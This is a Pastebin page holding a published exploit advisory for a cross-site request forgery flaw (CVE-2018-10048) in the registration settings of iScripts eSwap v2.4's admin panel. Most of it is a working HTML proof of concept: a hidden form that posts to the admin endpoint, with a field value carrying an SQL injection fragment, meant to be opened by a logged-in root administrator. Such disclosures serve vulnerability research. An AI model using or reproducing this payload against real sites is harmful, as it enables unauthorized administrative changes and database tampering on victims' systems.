Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit title: iScripts eSwap v2.4 - CSRF via the registration_settings.php Admin Panel
- # Date: 11/04/2018
- # Exploit Author: ManhNho
- # Vendor Homepage: https://www.iscripts.com
- # Software Link: https://www.iscripts.com/eswap
- # Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
- # Version: 2.4
- # CVE: CVE-2018-10048
- # Tested on: Windows 10 / Kali Linux
- # Category: Webapps
- #1. Description
- -----------------------------------------------------
- iScripts eSwap v2.4 has CSRF via the "registration_settings.php" function parameter in Admin Panel.
- #2. PoC
- -----------------------------------------------------
- a) Send below crafted request to logged in user who is having Root Administrator level access
- <html>
- <!-- CSRF PoC - ManhNho -->
- <body>
- <script>history.pushState('', '', '/')</script>
- <form action="https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php?act=post" method="POST">
- <input type="hidden" name="ddlFree" value="-1' order by 0 #" />
- <input type="hidden" name="txtDate" value="1" />
- <input type="submit" value="Submit request" />
- </form>
- </body>
- </html>
- b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
